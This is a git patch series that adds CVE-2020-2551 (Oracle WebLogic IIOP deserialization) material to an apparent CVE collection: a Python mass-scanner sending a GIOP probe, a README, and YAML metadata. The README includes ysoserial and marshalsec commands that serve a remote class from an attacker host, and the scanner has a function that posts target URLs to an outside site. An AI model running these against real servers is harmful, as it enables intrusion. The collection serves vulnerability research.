From 55647a003370b038f4b62cd56ebacc90881767db Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:38:13 +0000 Subject: [PATCH 01/17] update openkylin_list.yaml. Signed-off-by: Cryptocxf --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 897401df..d5e85d49 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -54,6 +54,8 @@ cve: - CVE-2019-3396 - CVE-2021-26084 - CVE-2022-26134 + weblogic: + - CVE-2020-2551 polkit: - CVE-2021-4034 vim: -- Gitee From 5d46d4f12248f218d59082bd3564ca90c560bb22 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:39:50 +0000 Subject: [PATCH 02/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20weblogic?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/.keep diff --git a/cve/weblogic/.keep b/cve/weblogic/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From f2210a74892f4d86498ff61bd3764ae45bb19f5c Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:40:17 +0000 Subject: [PATCH 03/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202020?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/2020/.keep diff --git a/cve/weblogic/2020/.keep b/cve/weblogic/2020/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From a739ded5ce0091b5b12d6c948fa5653c6496fe6d Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:41:25 +0000 Subject: [PATCH 04/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/2020/yaml/.keep diff --git a/cve/weblogic/2020/yaml/.keep b/cve/weblogic/2020/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ef54690326f2b8f75e0387327f06de35d2faff50 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:42:02 +0000 Subject: [PATCH 05/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2020-2551?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/CVE-2020-2551/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/2020/CVE-2020-2551/.keep diff --git a/cve/weblogic/2020/CVE-2020-2551/.keep b/cve/weblogic/2020/CVE-2020-2551/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From d7f80d6384baad9c89990fe53db12f2df2340fcd Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:42:17 +0000 Subject: [PATCH 06/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/weblogic/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/weblogic/.keep diff --git a/cve/weblogic/.keep b/cve/weblogic/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 1fd3d6a185528b159b62689013b07e06bb2bde14 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:42:27 +0000 Subject: [PATCH 07/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/weblogic/2020/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/weblogic/2020/.keep diff --git a/cve/weblogic/2020/.keep b/cve/weblogic/2020/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From c5aa9389f8dcaa5ab1cc3144bcd935900c752378 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:45:22 +0000 Subject: [PATCH 08/17] update CVE_PoC Signed-off-by: Cryptocxf --- cve/weblogic/2020/yaml/CVE-2020-2551.py | 119 ++++++++++++++++++++++++ cve/weblogic/2020/yaml/README.md | 114 +++++++++++++++++++++++ 2 files changed, 233 insertions(+) create mode 100644 cve/weblogic/2020/yaml/CVE-2020-2551.py create mode 100644 cve/weblogic/2020/yaml/README.md diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.py b/cve/weblogic/2020/yaml/CVE-2020-2551.py new file mode 100644 index 00000000..c96ba6f7 --- /dev/null +++ b/cve/weblogic/2020/yaml/CVE-2020-2551.py @@ -0,0 +1,119 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +import socket,argparse,sys,requests,os,atexit +from urllib.parse import urlparse +from multiprocessing.dummy import Pool as ThreadPool +""" +only check CVE-2020-2551 vuls +Twitter: @Hktalent3135773 +Creator: 51pwn_com +Site: https://51pwn.com +How use: +python3 CVE-2020-2551.py -u http://192.168.26.79:7001 +# 32 Thread check +cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e +cat ../T3.txt rst/T3.txt|sort -u -r|py3 ~/mytools/CVE-2020-2551/CVE-2020-2551.py -e +cat ../T3.txt rst/*.txt gy/*.txt|sort -u -r|py3 ~/mytools/CVE-2020-2551/CVE-2020-2551.py -e +""" +g_f = None + +bDebug=False +g_oNRpt={} +def log(e): + if bDebug: + print(e) +def doThreads(fnCbk,lists,nThreads=64): + pool = ThreadPool(nThreads) + pool.map(fnCbk,lists) + pool.close() + pool.join() + +def checkOnline(url,cbkUrl): + try: + requests.post('http://51pwn.com/CVE-2020-2551/',data={'url':url,cbkUrl:cbkUrl},timeout=(5,9)) + except Exception as e: + log(e) + pass + +def doSendOne(ip,port,data): + sock=None + res=None + s=ip+':'+str(port) + try: + if 0 == len(ip) or s in g_oNRpt: + return + g_oNRpt[s]='1' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(7) + server_addr = (ip, int(port)) + sock.connect(server_addr) + sock.send(data) + res = sock.recv(10) + if b'GIOP' in res: + #checkOnline(ip+':'+str(port),'http://yourSite/?target={}&rst={}') + return True + except Exception as e: + log(s) + log(e) + pass + finally: + if sock!=None: + sock.close() + return False +g_bPipe=False +def doOne(url): + global g_bPipe,g_f + if not 'http' in url: + url='http://'+url + oH=urlparse(url) + a=oH.netloc.split(':') + port=80 + if 2 == len(a): + port=a[1] + elif 'https' in oH.scheme: + port=443 + if doSendOne(a[0],port,bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')): + print('found CVE-2020-2551 ', oH.netloc) + g_f.write(oH.netloc + "\n") + g_f.flush() + elif g_bPipe == False: + print('not found CVE-2020-2551 ', oH.netloc) + +def doPipe(): + global g_bPipe + g_bPipe=True + buff = '' + a=[] + while True: + buff = sys.stdin.readline() + if not buff: + break + if buff.endswith('\n'): + szTmpCmd = buff[:-1] + szTmpCmd=szTmpCmd.rstrip() + buff = '' + if not szTmpCmd: + break + a.append(szTmpCmd) + doThreads(doOne,a) + +def exit_handler(): + global g_f + g_f.close() +atexit.register(exit_handler) +szFileOn = os.path.dirname(os.path.abspath(__file__))+ "/CVE-2020-2551.txt" +if __name__=='__main__': + parser = argparse.ArgumentParser() + parser.add_argument("-u","--url",help="http://xxx.xxx.xxx:7001/") + parser.add_argument("-e","--pipeCheck",help="pipe check is Ok,thread 32",action="store_true") + parser.add_argument("-o","--out",help="out file name",default="CVE-2020-2551.txt") + args = parser.parse_args() + if args.out: + szFileOn=args.out + g_f = open(szFileOn,"a+") + + if args.url: + doOne(args.url) + if args.pipeCheck: + doPipe() \ No newline at end of file diff --git a/cve/weblogic/2020/yaml/README.md b/cve/weblogic/2020/yaml/README.md new file mode 100644 index 00000000..4253d57a --- /dev/null +++ b/cve/weblogic/2020/yaml/README.md @@ -0,0 +1,114 @@ +Twitter: [@Hktalent3135773](https://twitter.com/Hktalent3135773) +[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=myhktools%20-%20Automated%20Pentest%20Recon%20Scanner%20%40Hktalent3135773&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2Fhktalent%2Fmyhktools) +[![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) + +# 0、how get pro exploit tools? +see https://github.com/hktalent/CVE-2020-2551/issues/5 + +# 1、CVE-2020-2551 +CVE-2020-2551 poc exploit python example +keys: +GIOP corba +image + + +### How use +``` +python3 CVE-2020-2551.py -u http://192.168.26.79:7001 +cat urls.txt|sort -u|xargs -I % python3 CVE-2020-2551.py -u % +cat xxx.html|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|xargs -I % python3 CVE-2020-2551.py -u % +# 32 Thread check +cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e +# now result to data/*.txt +java -cp hktalent_51pwn_com_12.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port +java -cp hktalent_51pwn_com_12.2.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port +``` + +### t3, t3s, http, https, iiop, iiops +``` +service:jmx:rmi://ip:port/jndi/iiop://ip:port/MBean-server-JNDI-name +service:jmx:iiop://ip:port/jndi/weblogic.management.mbeanservers.domainruntime +service:jmx:t3://ip:port/jndi/weblogic.management.mbeanservers.domainruntime +``` + +## poc +image + + + +# 2、your know your do +``` +{ + "ejb": { + "class": "com.sun.jndi.cosnaming.CNCtx", + "interfaces": [ + "javax.naming.Context" + ], + "mgmt": { + "MEJB": { + "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl", + "interfaces": [] + }, + "class": "com.sun.jndi.cosnaming.CNCtx", + "interfaces": [ + "javax.naming.Context" + ] + } + }, + "javax": { + "class": "com.sun.jndi.cosnaming.CNCtx", + "error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No", + "interfaces": [ + "javax.naming.Context" + ] + }, + "jdbc": { + "class": "com.sun.jndi.cosnaming.CNCtx", + "db_xf": { + "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl", + "interfaces": [] + }, + "interfaces": [ + "javax.naming.Context" + ] + }, + "mejbmejb_jarMejb_EO": { + "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl", + "interfaces": [] + }, + "weblogic": { + "class": "com.sun.jndi.cosnaming.CNCtx", + "error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No", + "interfaces": [ + "javax.naming.Context" + ] + } +} +``` + +# 3、ejb +``` +/bea_wls_internal/classes/mejb@/ + +weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj) +``` + +# 4、jta +``` +x.lookup("ejb/mgmt/MEJB").remove(jta); +``` +# 5、logs +- fix rmi use Jdk7u21 payload,not work for remote jdk8 +don‘t use +``` +java -cp $mtx/../tools/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 'whoami' +``` +use,XXclass.class from jdk6 build +``` +java -cp $mtx/../tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer 'http://YourIP:port/#XXclass' 1099 +``` + +# 6、thanks for +@[r4v3zn](https://github.com/r4v3zn) +@[0nise](https://github.com/0nise) +[![Top Langs](https://profile-counter.glitch.me/hktalent/count.svg)](https://51pwn.com) -- Gitee From e16223aa7ec592026fc3569549f6ab812ba8a52b Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:45:35 +0000 Subject: [PATCH 09/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/weblogic/2020/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/weblogic/2020/yaml/.keep diff --git a/cve/weblogic/2020/yaml/.keep b/cve/weblogic/2020/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 390727c7d0882e38f92f43a7320fb0beaedfce0e Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:46:22 +0000 Subject: [PATCH 10/17] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/weblogi?= =?UTF-8?q?c/2020/yaml=20=E4=B8=BA=20cve/weblogic/2020/CVE-2020-25511?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/{yaml => CVE-2020-25511}/CVE-2020-2551.py | 0 cve/weblogic/2020/{yaml => CVE-2020-25511}/README.md | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename cve/weblogic/2020/{yaml => CVE-2020-25511}/CVE-2020-2551.py (100%) rename cve/weblogic/2020/{yaml => CVE-2020-25511}/README.md (100%) diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.py b/cve/weblogic/2020/CVE-2020-25511/CVE-2020-2551.py similarity index 100% rename from cve/weblogic/2020/yaml/CVE-2020-2551.py rename to cve/weblogic/2020/CVE-2020-25511/CVE-2020-2551.py diff --git a/cve/weblogic/2020/yaml/README.md b/cve/weblogic/2020/CVE-2020-25511/README.md similarity index 100% rename from cve/weblogic/2020/yaml/README.md rename to cve/weblogic/2020/CVE-2020-25511/README.md -- Gitee From e980a96b06a77d4284cff134e2554b389715d24e Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:46:40 +0000 Subject: [PATCH 11/17] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/weblogi?= =?UTF-8?q?c/2020/CVE-2020-2551=20=E4=B8=BA=20cve/weblogic/2020/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/{CVE-2020-2551 => yaml}/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/weblogic/2020/{CVE-2020-2551 => yaml}/.keep (100%) diff --git a/cve/weblogic/2020/CVE-2020-2551/.keep b/cve/weblogic/2020/yaml/.keep similarity index 100% rename from cve/weblogic/2020/CVE-2020-2551/.keep rename to cve/weblogic/2020/yaml/.keep -- Gitee From fa1b93a1f9d29b56474c8cc5d7f066a6111602b0 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:46:52 +0000 Subject: [PATCH 12/17] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/weblogi?= =?UTF-8?q?c/2020/CVE-2020-25511=20=E4=B8=BA=20cve/weblogic/2020/CVE-2020-?= =?UTF-8?q?2551?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2020/{CVE-2020-25511 => CVE-2020-2551}/CVE-2020-2551.py | 0 cve/weblogic/2020/{CVE-2020-25511 => CVE-2020-2551}/README.md | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename cve/weblogic/2020/{CVE-2020-25511 => CVE-2020-2551}/CVE-2020-2551.py (100%) rename cve/weblogic/2020/{CVE-2020-25511 => CVE-2020-2551}/README.md (100%) diff --git a/cve/weblogic/2020/CVE-2020-25511/CVE-2020-2551.py b/cve/weblogic/2020/CVE-2020-2551/CVE-2020-2551.py similarity index 100% rename from cve/weblogic/2020/CVE-2020-25511/CVE-2020-2551.py rename to cve/weblogic/2020/CVE-2020-2551/CVE-2020-2551.py diff --git a/cve/weblogic/2020/CVE-2020-25511/README.md b/cve/weblogic/2020/CVE-2020-2551/README.md similarity index 100% rename from cve/weblogic/2020/CVE-2020-25511/README.md rename to cve/weblogic/2020/CVE-2020-2551/README.md -- Gitee From 2bfac19013cebaaa5558e95295d7000a9f1807b9 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:47:28 +0000 Subject: [PATCH 13/17] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/weblogi?= =?UTF-8?q?c/2020/yaml/.keep=20=E4=B8=BA=20cve/weblogic/2020/yaml/CVE-2020?= =?UTF-8?q?-2551.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/yaml/{.keep => CVE-2020-2551.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/weblogic/2020/yaml/{.keep => CVE-2020-2551.yaml} (100%) diff --git a/cve/weblogic/2020/yaml/.keep b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml similarity index 100% rename from cve/weblogic/2020/yaml/.keep rename to cve/weblogic/2020/yaml/CVE-2020-2551.yaml -- Gitee From 170b8029aa32636a623c3eee000644bd10d73ec7 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 09:15:24 +0000 Subject: [PATCH 14/17] update cve/weblogic/2020/yaml/CVE-2020-2551.yaml. Signed-off-by: Cryptocxf --- cve/weblogic/2020/yaml/CVE-2020-2551.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml index e69de29b..49a3ea4e 100644 --- a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml +++ b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml @@ -0,0 +1,19 @@ +id: CVE-2020-2551 +source: https://github.com/hktalent/CVE-2020-2551 +info: + name: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 + severity: high + description: | + 这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。 + scope-of-influence: + weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0 + reference: + - https://www.oracle.com/security-alerts/cpujan2020.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-2551 + cwe-id: None + cnvd-id: None + kve-id: None + tags: cve2020,Weblogic,反序列化 \ No newline at end of file -- Gitee From 76e6b84ffe3ee9fcd15a43512278e37f7605c579 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Thu, 23 Mar 2023 07:02:00 +0000 Subject: [PATCH 15/17] update cve/weblogic/2020/yaml/CVE-2020-2551.yaml. Signed-off-by: Cryptocxf --- cve/weblogic/2020/yaml/CVE-2020-2551.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml index 49a3ea4e..a676c2c5 100644 --- a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml +++ b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml @@ -2,18 +2,19 @@ id: CVE-2020-2551 source: https://github.com/hktalent/CVE-2020-2551 info: name: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 - severity: high + severity: critical description: | 这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。 scope-of-influence: weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0 reference: - https://www.oracle.com/security-alerts/cpujan2020.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-2551 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2551 - cwe-id: None + cwe-id: NVD-CWE-noinfo cnvd-id: None kve-id: None - tags: cve2020,Weblogic,反序列化 \ No newline at end of file + tags: cve2020, Weblogic, 反序列化 \ No newline at end of file -- Gitee From 2bdc5007747b50d7e94ece8c74fbf22280a1a379 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Mon, 27 Mar 2023 07:08:05 +0000 Subject: [PATCH 16/17] update cve/weblogic/2020/yaml/CVE-2020-2551.yaml. Signed-off-by: Cryptocxf --- cve/weblogic/2020/yaml/CVE-2020-2551.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml index a676c2c5..abc2967c 100644 --- a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml +++ b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml @@ -11,10 +11,10 @@ info: - https://www.oracle.com/security-alerts/cpujan2020.html - https://nvd.nist.gov/vuln/detail/CVE-2020-2551 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2551 - cwe-id: NVD-CWE-noinfo + cwe-id: NVD-CWE-None cnvd-id: None kve-id: None tags: cve2020, Weblogic, 反序列化 \ No newline at end of file -- Gitee From 1eaff881dbcc9580b0a7be41be970495c4ca7541 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Mon, 27 Mar 2023 07:37:47 +0000 Subject: [PATCH 17/17] update cve/weblogic/2020/yaml/CVE-2020-2551.yaml. Signed-off-by: Cryptocxf --- cve/weblogic/2020/yaml/CVE-2020-2551.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml index abc2967c..a1540092 100644 --- a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml +++ b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2551 - cwe-id: NVD-CWE-None + cwe-id: None cnvd-id: None kve-id: None tags: cve2020, Weblogic, 反序列化 \ No newline at end of file -- Gitee